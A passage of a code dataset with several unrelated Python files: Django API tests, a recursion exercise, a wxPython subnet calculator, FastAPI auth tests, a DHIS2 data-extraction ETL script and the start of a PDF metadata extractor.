ninja_client.post(\n '/publications/publications/add_publication_item/1',\n json={'publication_items': new_pub_items},\n user=user_one\n )\n assert add_valid_pub_item_response.status_code == 200\n assert add_valid_pub_item_response.status_code == publication_get_info\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef update_publications(\n ninja_client,\n user_one,\n publication_get_info,\n generate_basic_publications\n):\n # Update publication\n publication_get_info['price'] = 20000\n publication_get_info['description'] = 'new description'\n assert ninja_client.patch(\n '/pubications/publications/update_publication/1',\n json={\n 'price': publication_get_info['price'],\n 'description': publication_get_info['description']\n },\n user=user_one\n ).json() == publication_get_info\n # Update publication item\n new_amount = 10\n publication_get_info['publication_items'][0]['amount'] = new_amount\n assert ninja_client.patch(\n '/pubications/publications/update_publication_item/1',\n json={'amount': new_amount},\n user=user_one\n ).json() == publication_get_info\n # Fail invalid update\n assert ninja_client.patch(\n '/pubications/publications/update_publication_item/1',\n json={'amount': -10},\n user=user_one\n ).status_code == 400\n\n\n@pytest.mark.django_db(transaction=True, reset_sequences=True)\ndef test_upload_wrong_publication_files(\n ninja_client,\n super_user,\n user_one,\n user_one_creation_info,\n publication_creation_info,\n # publication_get_info,\n category_creation_info,\n category_photo_file,\n generate_seller_permissions\n):\n # Create user\n ninja_client.post(\n '/user_profiles/user_profiles/create',\n json=user_one_creation_info\n )\n # give the user seller permissions\n ninja_client.patch(\n '/user_profiles/permissions/assign_seller/1',\n user=super_user\n )\n # create category\n assert ninja_client.post(\n '/publications/categories/create',\n data={\n 'body': json.dumps(category_creation_info),\n },\n FILES={'file': category_photo_file},\n user=super_user\n ).json() == category_creation_info | {'id': 1, 'image_uri': _IMAGE_URI}\n # Give too many files\n publication_photo_files = MultiValueDict({\n 'files': [\n SimpleUploadedFile(f'test{i}.jpeg', b'img_data')\n for i in range(6)\n ]\n })\n assert ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=publication_photo_files,\n user=user_one\n ).status_code == 400\n # Give wrong extension\n wrong_extensions_publication_photo_files = MultiValueDict({\n 'files': [\n SimpleUploadedFile('test.txt', b'img_data')\n ]\n })\n response = ninja_client.post(\n '/publications/publications/create',\n data={\n 'body': json.dumps(publication_creation_info),\n },\n FILES=wrong_extensions_publication_photo_files,\n user=user_one\n )\n assert response.status_code == 400\n","repo_name":"JuanmaGuzman/Capstone_backend","sub_path":"src/publications/tests/publications_tests.py","file_name":"publications_tests.py","file_ext":"py","file_size_in_byte":16355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"73077269920","text":"import sys\nimport copy\nsys.stdin = open('input.txt')\n\ntestNum = int(input())\nfor test in range(testNum):\n a = int(input())\n\n def jump(a,tmpLst,chk):\n global lst\n if a < 0:\n return\n elif a==0:\n b = copy.deepcopy(tmpLst)\n if not b in lst:\n lst.append(b)\n else:\n for i in range(3,0,-1):\n if chk > i:\n continue\n tmpLst[i-1] += 1\n chk =i-1\n 
jump(a-i,tmpLst,chk)\n tmpLst[i-1] -= 1\n\n\n\n ####1은 1 1개\n ####2는 1+1, 2 2개\n ####3은 1 1 1 , 1 2, 3 / 3개\n\n ########완전탐색. [0,0,0] 하고\n\n tmpLst=[0,0,0]\n lst = []\n\n k = jump(a,tmpLst,3)\n\n\n print(len(lst))","repo_name":"cmkds/algo","sub_path":"study/0917/0917.py","file_name":"0917.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"74007580962","text":"import wx\nimport wx.adv\nimport wx.lib.agw.persist as pm\nfrom .SubnetCalcGUIbase import BaseCalculatorFrame, BaseSettingsFrame\nfrom .resources import *\n\n\n# ctrl-[A,C,V,X,Z], shift-insert\nctrl_ascii_chars = [\n wx.WXK_CONTROL_A, wx.WXK_CONTROL_C, wx.WXK_CONTROL_V, wx.WXK_CONTROL_X, wx.WXK_CONTROL_Z, wx.WXK_INSERT\n]\n\n\nclass SubnetCalcFrame(BaseCalculatorFrame):\n def __init__(self, *args, **kwds):\n BaseCalculatorFrame.__init__(self, *args, **kwds)\n\n # Used for dragging implementation\n self._initial_position = None\n\n self.labels = [\n self.label_broadcast, self.label_dotted, self.label_first_addr, self.label_last_addr, self.label_mask,\n self.label_network, self.label_slash, self.label_usable\n ]\n\n self.settings_window = SettingsFrame(self, name='SettingsFrame')\n\n self.text_controls = [self.text_ctrl_dotted, self.text_ctrl_mask]\n\n self.text_controls_readonly = [\n self.text_ctrl_broadcast, self.text_ctrl_first_addr, self.text_ctrl_last_addr, self.text_ctrl_network,\n self.text_ctrl_usable\n ]\n\n self.themes = {\n 'dark': {\n 'background': {'main': wx.Colour(60, 60, 60), 'text': wx.Colour(85, 85, 85)},\n 'foreground': {'main': wx.Colour(192, 192, 192), 'text': wx.Colour(232, 232, 232)}\n },\n 'light': {\n 'background': {'main': wx.Colour(238, 238, 238), 'text': wx.Colour(255, 255, 255)},\n 'foreground': {'main': wx.Colour(0, 0, 0), 'text': wx.Colour(0, 0, 0)}\n }\n }\n\n # Allow general handling of focus events for any relevant widget\n self.Bind(wx.EVT_CHILD_FOCUS, self.on_child_focus)\n\n # Allow 'minimizing' the window when pressing Escape if the frame has focus\n self.panel_main.Bind(wx.EVT_CHAR_HOOK, self.on_key)\n\n # Mouse bindings (for dragging the panel)\n self.panel_main.Bind(wx.EVT_LEFT_UP, self.on_mouse_button_up)\n self.panel_main.Bind(wx.EVT_MOTION, self.on_mouse)\n self.panel_main.Bind(wx.EVT_MOUSE_CAPTURE_LOST, self.on_mouse_lost)\n\n # Catching text input, used to automatically run conversions\n self.Bind(wx.EVT_TEXT, self.on_text, self.text_ctrl_dotted)\n self.Bind(wx.EVT_TEXT, self.on_text, self.text_ctrl_mask)\n\n # Catching individual character input, to only allow valid characters\n self.text_ctrl_dotted.Bind(wx.EVT_CHAR, self.on_char)\n self.text_ctrl_mask.Bind(wx.EVT_CHAR, self.on_char)\n\n self.text_ctrl_dotted.Bind(wx.EVT_TEXT_PASTE, self.on_paste)\n self.text_ctrl_mask.Bind(wx.EVT_TEXT_PASTE, self.on_paste)\n\n self.SetName('MainFrame')\n self.checkbox_stay_on_top.SetName('checkbox_stay_on_top')\n\n self.Center()\n\n self.persistence_manager = pm.PersistenceManager.Get()\n self.persistence_manager.SetManagerStyle(pm.PM_DEFAULT_STYLE | pm.PM_PERSIST_CONTROL_VALUE)\n\n # Restore any saved selections and window placement\n self.persistence_manager.RegisterAndRestore(self)\n self.persistence_manager.RegisterAndRestoreAll(\n self, children=[\n self.checkbox_stay_on_top, self.text_ctrl_dotted, self.spin_ctrl_mask,\n self.settings_window.radio_box_theme\n ]\n )\n\n self.apply_theme(theme_name=self.settings_window.radio_box_theme.GetStringSelection())\n\n 
self.select_all_text(self.text_ctrl_dotted)\n\n self.slider_mask.SetValue(self.spin_ctrl_mask.GetValue())\n\n self.stay_on_top(enable=self.checkbox_stay_on_top.IsChecked())\n\n def apply_theme(self, theme_name: str):\n theme = self.themes.get(theme_name, None)\n if not theme:\n return # TODO: consider raising an exception, especially if customization is introduced.\n\n # Main colors\n background_main = theme['background']['main']\n foreground_main = theme['foreground']['main']\n\n # Colors for normal-state TextCtrl objects\n background_text = theme['background']['text']\n foreground_text = theme['foreground']['text']\n\n self.bitmap_button_settings.SetBackgroundColour(background_main)\n self.bitmap_button_exit.SetBackgroundColour(background_main)\n\n self.checkbox_stay_on_top.SetBackgroundColour(background_main)\n self.checkbox_stay_on_top.SetForegroundColour(foreground_main)\n\n for label in self.labels:\n label.SetBackgroundColour(background_main)\n label.SetForegroundColour(foreground_main)\n\n self.panel_main.SetBackgroundColour(background_main)\n self.panel_main.SetForegroundColour(foreground_main)\n\n self.slider_mask.SetBackgroundColour(background_main)\n self.slider_mask.SetForegroundColour(foreground_main)\n\n self.spin_ctrl_mask.SetBackgroundColour(background_text)\n self.spin_ctrl_mask.SetForegroundColour(foreground_text)\n\n for text_control in self.text_controls:\n text_control.SetBackgroundColour(background_text)\n text_control.SetForegroundColour(foreground_text)\n\n for text_control in self.text_controls_readonly:\n text_control.SetBackgroundColour(background_main)\n text_control.SetForegroundColour(foreground_main)\n\n self.Refresh()\n\n # fix refresh issue for slider\n # https://stackoverflow.com/questions/24959740/wxpython-slider-background-colour-incomplete-change\n width, height = self.slider_mask.GetClientSize()\n self.slider_mask.SetClientSize((width + 1, height))\n self.slider_mask.SetClientSize((width, height))\n\n @staticmethod\n def get_clipboard_string() -> tuple:\n \"\"\"Try to get text data from the clipboard and return a tuple indicating success and the text value\"\"\"\n clipboard_string = ''\n success = False\n text_data = wx.TextDataObject()\n if wx.TheClipboard.Open():\n success = wx.TheClipboard.GetData(text_data)\n wx.TheClipboard.Close()\n if success:\n clipboard_string = text_data.GetText()\n return success, clipboard_string\n\n def on_button_exit(self, event):\n \"\"\"Save window position and settings when the user presses the button to close the application\"\"\"\n self.persistence_manager.SaveAndUnregister()\n self.Close(force=True)\n\n def on_button_settings(self, event):\n \"\"\"Open the settings window, or focus it if it's already open.\"\"\"\n if self.settings_window.IsShown():\n self.settings_window.Raise()\n else:\n self.settings_window.Show()\n self.settings_window.CenterOnParent()\n self.settings_window.radio_box_theme.SetFocus()\n\n def on_char(self, event):\n \"\"\"Allow movement and command keys in TextCtrl objects\"\"\"\n if event.IsKeyInCategory(wx.WXK_CATEGORY_NAVIGATION | wx.WXK_CATEGORY_CUT | wx.WXK_CATEGORY_TAB):\n event.Skip()\n elif event.GetKeyCode() in ctrl_ascii_chars:\n event.Skip()\n\n def on_checkbox_stay_on_top(self, event):\n self.stay_on_top(event.IsChecked())\n event.Skip()\n\n def on_child_focus(self, event):\n \"\"\"Allows general handling of focus events for different types of widgets throughout the program\"\"\"\n event_object = event.GetEventObject()\n if isinstance(event_object, wx.TextCtrl):\n 
self.select_all_text(event_object)\n else:\n event.Skip()\n\n def on_key(self, event):\n \"\"\"Minimize (iconize) the window on escape key\"\"\"\n if event.GetKeyCode() == wx.WXK_ESCAPE:\n self.Iconize()\n else:\n event.Skip()\n\n def on_mouse(self, event):\n \"\"\"Implement click-and-drag for the frame/panel\"\"\"\n if not event.Dragging():\n # Panel is not being dragged, reset and bail\n self._initial_position = None\n return\n if not self.panel_main.HasCapture():\n # In Drag event, make sure we capture the mouse\n self.panel_main.CaptureMouse()\n if not self._initial_position:\n # Panel is being dragged, store current position\n self._initial_position = event.GetPosition()\n else:\n # Panel is being dragged and we already have a previous position, move the window\n new_position = event.GetPosition()\n delta = self._initial_position - new_position\n self.SetPosition(self.GetPosition() - delta)\n\n def on_mouse_button_up(self, event):\n \"\"\"Makes sure the mouse gets released from dragging\"\"\"\n if self.panel_main.HasCapture():\n self.panel_main.ReleaseMouse()\n\n def on_mouse_lost(self, event):\n \"\"\"This function can be used to abort anything relying on mouse input.\"\"\"\n pass\n\n def on_paste(self, event) -> tuple:\n \"\"\"This will get the value from the clipboard and return a success indicator and string in a tuple\"\"\"\n return self.get_clipboard_string()\n\n def on_slider(self, event):\n slider_value = event.GetInt()\n self.spin_ctrl_mask.SetValue(slider_value)\n\n def on_spinctrl(self, event):\n spin_value = event.GetInt()\n self.slider_mask.SetValue(spin_value)\n\n def on_text(self, event):\n print(\"Event handler 'on_text' not implemented!\")\n event.Skip()\n\n def reset_results(self):\n for text_control in self.text_controls_readonly:\n text_control.ChangeValue('')\n\n def select_all_text(self, text_control):\n wx.CallAfter(text_control.SetInsertionPointEnd)\n wx.CallAfter(text_control.SelectAll)\n\n def stay_on_top(self, enable: bool = True):\n if enable:\n # Binary OR wx.STAY_ON_TOP to add it if it's not already present\n self.SetWindowStyle(self.GetWindowStyle() | wx.STAY_ON_TOP)\n else:\n # Binary XOR wx.STAY_ON_TOP to remove it if it is present\n self.SetWindowStyle(self.GetWindowStyle() ^ wx.STAY_ON_TOP)\n\n\nclass SettingsFrame(BaseSettingsFrame):\n def __init__(self, *args, **kwds):\n kwds[\"style\"] = kwds.get(\"style\", 0)\n BaseSettingsFrame.__init__(self, *args, **kwds)\n self.Bind(wx.EVT_CLOSE, self.on_close)\n\n self.radio_box_theme.SetName('radio_box_theme')\n\n def on_about(self, event):\n program_description = \\\n \"\"\"Quick Subnet Calculator displays additional information calculated from an IP and subnet mask.\"\"\"\n program_license = \\\n \"LGPL-3.0-or-later (GNU Lesser General Public License 3.0 or later)\\n\" \\\n \"See the files COPYING and COPYING.LESSER distributed with this program\\n\" \\\n \"or https://www.gnu.org/licenses/ if you did not receive them with your copy.\"\n info = wx.adv.AboutDialogInfo()\n info.SetIcon(SubnetCalcPNG.GetIcon())\n info.SetName('Quick Subnet Calculator')\n info.SetVersion('1.1')\n info.SetDescription(program_description)\n info.SetCopyright('(C) 2018, 2019 Brandon M. Pace ')\n info.SetWebSite('https://github.com/brandonmpace/Quick-Subnet-Calculator')\n info.SetLicense(program_license)\n # info.AddDeveloper('Brandon M. 
Pace')\n\n wx.adv.AboutBox(info, parent=self)\n\n def on_close(self, event):\n \"\"\"This function is used to just hide the settings window when the user clicks the close button.\"\"\"\n if event.CanVeto():\n self.Hide()\n event.Veto()\n else:\n event.Skip()\n\n def on_radiobox_theme(self, event):\n self.Parent.apply_theme(event.GetString())\n event.Skip()\n","repo_name":"brandonmpace/Quick-Subnet-Calculator","sub_path":"GUI/SubnetCalcGUI.py","file_name":"SubnetCalcGUI.py","file_ext":"py","file_size_in_byte":11642,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"14421250107","text":"import pytest\nfrom fastapi import status\n\nfrom .factories import get_fake_user\n\n\n@pytest.mark.anyio\nclass TestAuth:\n\n async def test_auth(self, client):\n\n user = get_fake_user()\n\n response = await client.post(\n '/api/auth/register',\n json=user,\n )\n\n assert response.status_code == status.HTTP_201_CREATED\n\n response = await client.post(\n '/api/auth/login',\n headers={'Content-Type': 'application/x-www-form-urlencoded'},\n data={\n 'username': user['username'],\n 'password': user['password'],\n }\n )\n assert response.status_code == status.HTTP_200_OK\n\n cookies = response.cookies\n\n response = await client.post(\n '/api/auth/logout',\n cookies=cookies,\n )\n\n assert response.status_code == status.HTTP_200_OK\n","repo_name":"xristxgod/Crypto-Finance-Dashboard","sub_path":"backend/src/core/users/tests/tests_auth.py","file_name":"tests_auth.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70670498722","text":"#!/usr/bin/env python3\n\nimport argparse\nimport json\nimport os\nimport sys\n\nimport etl\nimport pandas as pd\nimport requests\nfrom dotenv import load_dotenv\nfrom requests.auth import HTTPBasicAuth\nfrom urllib.parse import urljoin\n\nimport credentials\n\netl.LOGGER = etl.logging.get_logger(log_name=\"DHIS2 pivot table pull\", log_group=\"etl\")\n\n\n@etl.decorators.log_start_and_finalisation(\"getting DHIS2 metadata\")\ndef get_metadata(from_pickle=False):\n global category_combos\n global data_elements\n global org_units\n build_dir_ = os.path.join(OUTPUT_DIR_NAME, \"build\")\n os.makedirs(build_dir_, exist_ok=True)\n cc_pickle_path = os.path.join(build_dir_, \"category_combos.pickle\")\n de_pickle_path = os.path.join(build_dir_, \"data_elements.pickle\")\n ou_pickle_path = os.path.join(build_dir_, \"org_units.pickle\")\n p_exist = all(map(os.path.exists, [cc_pickle_path, de_pickle_path, ou_pickle_path]))\n if from_pickle and p_exist:\n category_combos = pd.read_pickle(cc_pickle_path)\n data_elements = pd.read_pickle(de_pickle_path)\n org_units = pd.read_pickle(ou_pickle_path)\n return\n cc_resource = \"categoryOptionCombos?paging=false&fields=id,name\"\n de_resource = \"dataElements?paging=false&fields=id,name\"\n ou_resource = \"organisationUnits?paging=false&fields=id,name\"\n r_cc = __get_dhis2_api_resource(cc_resource)\n r_de = __get_dhis2_api_resource(de_resource)\n r_ou = __get_dhis2_api_resource(ou_resource)\n cc_list = json.loads(r_cc.text)['categoryOptionCombos']\n de_list = json.loads(r_de.text)['dataElements']\n ou_list = json.loads(r_ou.text)['organisationUnits']\n category_combos = pd.DataFrame(cc_list)\n data_elements = pd.DataFrame(de_list)\n org_units = pd.DataFrame(ou_list)\n category_combos.to_pickle(cc_pickle_path)\n data_elements.to_pickle(de_pickle_path)\n 
org_units.to_pickle(ou_pickle_path)\n\n\n@etl.decorators.log_start_and_finalisation(\"get DHIS2 pivot table data\")\ndef get_dhis2_pivot_table_data(pivot_table_id, from_pickle=False):\n build_dir_ = os.path.join(OUTPUT_DIR_NAME, \"build\")\n os.makedirs(build_dir_, exist_ok=True)\n pt_pickle_path = os.path.join(build_dir_, f\"pivot_table_{pivot_table_id}.pickle\")\n if from_pickle and os.path.exists(pt_pickle_path):\n df = pd.read_pickle(pt_pickle_path)\n return df\n dhis2_pivot_table_resource = __get_dhis2_table_api_resource(pivot_table_id)\n r_pt = __get_dhis2_api_resource(dhis2_pivot_table_resource)\n json_pt = json.loads(r_pt.text)\n df = pd.DataFrame(json_pt['dataValues'])\n df.to_pickle(pt_pickle_path)\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"export category config\")\ndef export_category_config(df: pd.DataFrame) -> pd.DataFrame:\n categories_names = df['categoryOptionCombo'].replace(category_combos.set_index('id')['name'])\n categories_ids = df['categoryOptionCombo']\n categories_map = pd.DataFrame()\n categories_map['name'] = categories_names\n categories_map['id'] = categories_ids\n categories_map = categories_map.drop_duplicates(subset='id')\n\n data_elements_names = df['dataElement'].replace(data_elements.set_index('id')['name'])\n data_elements_ids = df['dataElement']\n data_elements_map = pd.DataFrame()\n data_elements_map['name'] = data_elements_names\n data_elements_map['id'] = data_elements_ids\n data_elements_map = data_elements_map.drop_duplicates(subset='id')\n\n config_output_dir = os.path.join(OUTPUT_DIR_NAME, \"configs\")\n os.makedirs(config_output_dir, exist_ok=True)\n with open(os.path.join(config_output_dir, f\"{TABLE_TYPE}_category_config.json\"), 'w') as f:\n f.write(\"[\")\n first = True\n for i, row in categories_map.iterrows():\n if not first:\n f.write(',')\n else:\n first = False\n line = f'''\n{{\n \"id\": \"{row[\"id\"]}\",\n \"name\": \"{row[\"name\"]}\",\n \"mapping\": {{\n \"age_group\": \"\",\n \"sex\": \"\"\n }}\n}}'''\n f.write(line)\n f.write(\"\\n]\\n\")\n with open(os.path.join(config_output_dir, f\"{TABLE_TYPE}_column_config.json\"), 'w') as f:\n f.write(\"[\")\n first = True\n for i, row in data_elements_map.iterrows():\n if not first:\n f.write(',')\n else:\n first = False\n line = f'''\n{{\n \"id\": \"{row[\"id\"]}\",\n \"name\": \"{row[\"name\"]}\",\n \"mapping\": \"\",\n \"categoryMapping\": {{\n \"age_group\": \"\",\n \"sex\": \"\"\n }}\n}}'''\n f.write(line)\n f.write(\"\\n]\\n\")\n\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"extract data elements names\")\ndef extract_data_elements_names(df: pd.DataFrame) -> pd.DataFrame:\n df['dataElementName'] = df['dataElement']\n if PROGRAM_DATA_COLUMN_CONFIG:\n de_id_map = {}\n for column_config_filename in PROGRAM_DATA_COLUMN_CONFIG.split(','):\n with open(column_config_filename, 'r') as f:\n program_config = json.loads(f.read())\n for config_ in program_config:\n mapping = config_.get('mapping')\n if not mapping:\n continue\n elif type(mapping) != list:\n mapping = [mapping]\n de_id_map[config_['id']] = mapping\n extra_rows = pd.DataFrame(columns=list(df))\n for i, row in df.iterrows():\n de_id = row['dataElementName']\n mappings = de_id_map.get(de_id, [])\n if len(mappings) == 0:\n continue\n df.loc[i, 'dataElementName'] = mappings[0]\n if len(mappings) > 1:\n for mapping in mappings[1:]:\n extra_row = row.copy()\n extra_row['dataElementName'] = mapping\n extra_rows = extra_rows.append(extra_row)\n df = df.append(extra_rows, ignore_index=True)\n\n # use 
default dhis2 de names for ids not in config\n df['dataElementName'] = df['dataElementName'].replace(data_elements.set_index('id')['name'])\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"extract areas names\")\ndef extract_areas_names(df: pd.DataFrame) -> pd.DataFrame:\n df['area_id'] = df['orgUnit']\n df['area_name'] = df['orgUnit'].replace(org_units.set_index('id')['name'])\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"sort by area name\")\ndef sort_by_area_name(df: pd.DataFrame) -> pd.DataFrame:\n return df.sort_values(by=['area_name', 'period']).reset_index(drop=True)\n\n\n@etl.decorators.log_start_and_finalisation(\"extract categories and aggregate data\")\ndef extract_categories_and_aggregate_data(df: pd.DataFrame) -> pd.DataFrame:\n category_mapping = {}\n for category_config_filename in PROGRAM_DATA_CATEGORY_CONFIG.split(','):\n with open(category_config_filename, 'r') as f:\n category_config = json.loads(f.read())\n map_ = {x['id']: x.get('mapping', {}) for x in category_config}\n category_mapping.update(map_)\n if PROGRAM_DATA_COLUMN_CONFIG:\n column_categories_map = {}\n for column_config_filename in PROGRAM_DATA_COLUMN_CONFIG.split(','):\n with open(column_config_filename, 'r') as f:\n column_config = json.loads(f.read())\n map_ = {x['id']: x.get('categoryMapping') for x in column_config}\n column_categories_map.update(map_)\n else:\n column_categories_map = {}\n categories_to_remove = set([x['id'] for x in category_config if bool(x.get('remove'))])\n df = df.loc[~df['categoryOptionCombo'].isin(categories_to_remove)]\n metadata_cols = ['area_id', 'area_name', 'period']\n for i, row in df.iterrows():\n category_id = row['categoryOptionCombo']\n de_id = row['dataElement']\n categories = column_categories_map.get(de_id) or category_mapping[category_id]\n for c_name, c_value in categories.items():\n if c_name not in metadata_cols:\n metadata_cols.append(c_name)\n df.loc[i, c_name] = c_value\n\n df['value'] = pd.to_numeric(df['value'], errors='coerce', downcast='integer')\n df[metadata_cols] = df[metadata_cols].fillna('')\n\n aggregated_rows = df[metadata_cols + ['dataElementName', 'value']].groupby(metadata_cols + ['dataElementName']).sum().reset_index()\n pivot = aggregated_rows.pivot(columns='dataElementName', values='value')\n semi_wide_format_df = pd.concat([aggregated_rows[metadata_cols], pivot], axis=1)\n\n data_cols = [x for x in semi_wide_format_df if x not in set(metadata_cols)]\n\n joined_rows = semi_wide_format_df.copy().drop_duplicates(subset=metadata_cols).set_index(metadata_cols)\n for i, row in semi_wide_format_df.iterrows():\n index = list(row[metadata_cols].values)\n for col_name, val in row[data_cols].items():\n if pd.notna(val):\n joined_rows.loc[tuple(index), col_name] = val\n output_df = joined_rows.reset_index()\n return output_df\n\n\n@etl.decorators.log_start_and_finalisation(\"trimming period strings\")\ndef trim_period_strings(df: pd.DataFrame) -> pd.DataFrame:\n df['period'] = df['period'].str[:4]\n df = df.rename(columns={'period': 'year'})\n return df\n\n\n@etl.decorators.log_start_and_finalisation(\"map dhis2 id to area id\")\ndef map_dhis2_id_area_id(df: pd.DataFrame) -> pd.DataFrame:\n if AREA_ID_MAP:\n area_id_df = pd.read_csv(AREA_ID_MAP, index_col=False)\n if 'map_id' in list(area_id_df):\n mapping_column_name = 'map_id'\n else:\n mapping_column_name = 'dhis2_id'\n df['area_id'] = df['area_id'].replace(area_id_df.set_index(mapping_column_name)['area_id'])\n return df\n\n\ndef __get_dhis2_api_resource(resource):\n r = 
requests.get(urljoin(DHIS2_URL, resource), auth=HTTPBasicAuth(DHIS2_USERNAME, DHIS2_PASSWORD))\n etl.requests_util.check_if_response_is_ok(r)\n return r\n\n\ndef __fetch_pivot_table_details(dhis2_pivot_table_id):\n reportTableReport = f\"reportTables/{dhis2_pivot_table_id}\"\n rt_r = __get_dhis2_api_resource(reportTableReport)\n return json.loads(rt_r.text)\n\n\ndef __get_dhis2_table_api_resource(pivot_table_id):\n pivot_table_metadata = __fetch_pivot_table_details(pivot_table_id)\n dimensions_dx = [x['dataElement']['id'] for x in pivot_table_metadata['dataDimensionItems'] if x['dataDimensionItemType'] == \"DATA_ELEMENT\"]\n ou_elms = [x['id'] for x in pivot_table_metadata['organisationUnits']]\n ou_level = [f\"LEVEL-{x!r}\" for x in pivot_table_metadata.get('organisationUnitLevels', [])]\n periods = [x['id'] for x in pivot_table_metadata['periods']]\n if len(dimensions_dx) < 1:\n raise ValueError(f\"No data elements configured for pivot table {pivot_table_id}\")\n if len(ou_elms + ou_level) < 1:\n raise ValueError(f\"No org units configured for pivot table {pivot_table_id}\")\n if len(periods) < 1:\n raise ValueError(f\"No periods configured for pivot table {pivot_table_id}\")\n pivot_table_resource = f\"analytics/dataValueSet.json?\" \\\n f\"dimension=dx:{';'.join(dimensions_dx)}&\" \\\n f\"dimension=co&\" \\\n f\"dimension=ou:{';'.join(ou_elms + ou_level)}&\" \\\n f\"dimension=pe:{';'.join(periods)}&\" \\\n f\"displayProperty=NAME\"\n return pivot_table_resource\n\n\ndef run_pipeline(input_df):\n return (input_df\n .pipe(extract_data_elements_names)\n .pipe(extract_areas_names)\n .pipe(extract_categories_and_aggregate_data)\n .pipe(sort_by_area_name)\n .pipe(map_dhis2_id_area_id)\n .pipe(trim_period_strings)\n )\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Pull geo data from a DHIS2 to be uploaded into ADR.')\n argv = sys.argv[1:]\n parser.add_argument('-e', '--env-file',\n default='.env',\n help='env file to read config from')\n parser.add_argument('-p', '--pickle',\n dest='pickle',\n action='store_true',\n help='fetch data from local pickle instead http call to DHIS2')\n parser.add_argument('-t', '--pivot-table-config',\n dest='pt_config',\n action='store_true',\n help='fetch pivot table configuration data from DHIS2')\n args = parser.parse_args()\n\n load_dotenv(args.env_file)\n EXPORT_NAME = os.environ.get('OUTPUT_DIR_NAME', 'default')\n OUTPUT_DIR_NAME = f\"output/{EXPORT_NAME}\"\n DHIS2_URL = os.getenv(\"DHIS2_URL\")\n credentials.read_credentials(os.getenv(\"DHIS2_CREDENTIALS_FILE\"))\n DHIS2_USERNAME = os.getenv(\"DHIS2_USERNAME\")\n DHIS2_PASSWORD = os.getenv(\"DHIS2_PASSWORD\")\n PROGRAM_DATA = os.getenv('PROGRAM_DATA')\n PROGRAM_DATA_CATEGORY_CONFIG = os.getenv(\"PROGRAM_DATA_CATEGORY_CONFIG\")\n # Legacy env name support\n if not PROGRAM_DATA_CATEGORY_CONFIG:\n PROGRAM_DATA_CATEGORY_CONFIG = os.getenv(\"PROGRAM_DATA_CONFIG\")\n PROGRAM_DATA_COLUMN_CONFIG = os.getenv(\"PROGRAM_DATA_COLUMN_CONFIG\")\n AREA_ID_MAP = os.getenv(\"AREA_ID_MAP\")\n\n get_metadata(from_pickle=args.pickle)\n tables = json.loads(PROGRAM_DATA)\n if args.pt_config:\n for table in tables:\n TABLE_TYPE = table['name']\n etl.LOGGER.info(f\"Starting fetching metadata for table \\\"{TABLE_TYPE}\\\"\")\n dhis2_pivot_table_id = table['dhis2_pivot_table_id']\n (get_dhis2_pivot_table_data(dhis2_pivot_table_id, from_pickle=args.pickle)\n .pipe(export_category_config)\n )\n etl.LOGGER.info(f\"Finished fetching metadata for table \\\"{TABLE_TYPE}\\\"\")\n else:\n for table in 
tables:\n TABLE_TYPE = table['name']\n etl.LOGGER.info(f\"Starting data fetch for table \\\"{TABLE_TYPE}\\\"\")\n dhis2_pivot_table_id = table['dhis2_pivot_table_id']\n input_df = get_dhis2_pivot_table_data(dhis2_pivot_table_id, from_pickle=args.pickle)\n out = run_pipeline(input_df)\n output_file_path = os.path.join(OUTPUT_DIR_NAME, 'program', f\"{EXPORT_NAME}_dhis2_pull_{TABLE_TYPE}.csv\")\n etl.LOGGER.info(f\"Saving \\\"{TABLE_TYPE}\\\" data to file {output_file_path}\")\n os.makedirs(os.path.join(OUTPUT_DIR_NAME, 'program'), exist_ok=True)\n out.to_csv(output_file_path, index=None, float_format='%.f')\n etl.LOGGER.info(f\"Finished processing table \\\"{TABLE_TYPE}\\\"\")\n","repo_name":"fjelltopp/unaids_etl","sub_path":"adr_dhis2_pivot_table_etl.py","file_name":"adr_dhis2_pivot_table_etl.py","file_ext":"py","file_size_in_byte":14539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30588322263","text":"#IMPORTING LIBRARY\nimport os\nfrom PIL import Image\nfrom PIL.ExifTags import TAGS\nfrom GPSPhoto import gpsphoto\nimport datetime\nfrom io import StringIO\nfrom pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom pdfminer.pdfparser import PDFParser\nfrom pdfminer.pdfdocument import PDFDocument\nimport tkinter as tk\nimport tkinter.font as tkFont\nfrom tkinter import filedialog\nimport olefile\nimport docx\n##### PDF TYPE METADATA #####\n\n# # Open the Word document\n# filename = \"C:/Users/User/Desktop/Degree/ITT632/ITT632-Project-CS251.doc\"\n# ole = olefile.OleFileIO(filename)\n\n# # Get the metadata\n# info = ole.get_metadata()\n\n# # Print the metadata\n# print(info.keys())\n# # print(\"Author:\", info.author.decode('ISO-8859-1'))\n# # print(\"Created:\", info.create_time)\n# # print(\"Modified:\", info.last_saved_time)\n# # print(\"Subject:\", info.subject.decode('utf-8'))\n# # print(\"Title:\", info.title.decode('ISO-8859-1'))\n\n# # Close the file\n# ole.close()\n\ndef extract_pdf_metadata(path):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, laparams=laparams)\n\n with open(path, 'rb') as fp:\n parser = PDFParser(fp)\n doc = PDFDocument(parser)\n return doc.info\n\ndef parse_creation_date(creation_date_str):\n # creation_date_str = creation_date_str.decode('utf-8')\n date_format = 'D:%Y%m%d%H%M%S'\n creation_date = datetime.datetime.strptime(creation_date_str[:16], date_format)\n return creation_date.strftime('%Y-%m-%d %H:%M:%S')\n\ndef parse_modification_date(mod_date_str):\n date_format = 'D:%Y%m%d%H%M%S'\n mod_date = 